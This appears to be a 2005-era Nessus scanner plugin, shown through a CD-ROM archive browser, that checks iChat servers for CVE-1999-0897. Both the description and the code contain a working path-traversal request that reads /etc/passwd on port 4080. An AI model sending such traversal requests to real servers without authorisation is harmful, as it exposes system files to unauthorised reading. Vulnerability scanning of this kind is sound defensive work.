home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / iChat.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  72 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10110);
  10.  script_version ("$Revision: 1.17 $");
  11.  script_cve_id("CVE-1999-0897");
  12.  name["english"] = "iChat";
  13.  name["francais"] = "iChat";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "iChat servers up to version 3.00 allow 
  17. any remote user to read arbitrary files on the target system
  18. by doing the request :
  19.     http://chat.server:4080/../../../../../etc/passwd
  20.  
  21. Risk factor : High
  22.  
  23. Solution : Upgrade your iChat server or disable it";
  24.  
  25.  desc["francais"] = "Les serveurs iChat, jusqu'α la version 3.00,
  26. permettent α n'importe quel utilisateur distant de lire des fichiers
  27. arbitraires en faisant simplement une requΦte du type :
  28.     http://chat.server:4080/../../../../../etc/passwd
  29.  
  30. Facteur de risque : ElevΘ.
  31.  
  32. Solution : Mettez α jour votre serveur iChat, ou alors dΘsactivez le";
  33.  
  34.  script_description(english:desc["english"], francais:desc["francais"]);
  35.  
  36.  summary["english"] = "Determines if iChat is vulnerable to a stupid bug";
  37.  summary["francais"] = "Determine si iChat est vulnΘrable α un bug stupide";
  38.  
  39.  script_summary(english:summary["english"], francais:summary["francais"]);
  40.  
  41.  script_category(ACT_GATHER_INFO);
  42.  
  43.  
  44.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  45.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  46.  family["english"] = "Remote file access";
  47.  family["francais"] = "AccΦs aux fichiers distants";
  48.  
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_require_ports(4080);
  51.  exit(0);
  52. }
  53.  
  54. #
  55. # The script code starts here
  56. #
  57.  
  58. include("http_func.inc");
  59.  
  60. if(get_port_state(4080))
  61. {
  62.  data = http_get(item:"../../../../../../../etc/passwd", port:4080);
  63.  soc = http_open_socket(4080);
  64.  if(soc)
  65.  {
  66.   send(socket:soc, data:data);
  67.   result = http_recv(socket:soc);
  68.   if(egrep(pattern:".*root:.*:0:[01]:.*", string:result))security_hole(4080);
  69.   http_close_socket(soc);
  70.  }
  71. }
  72.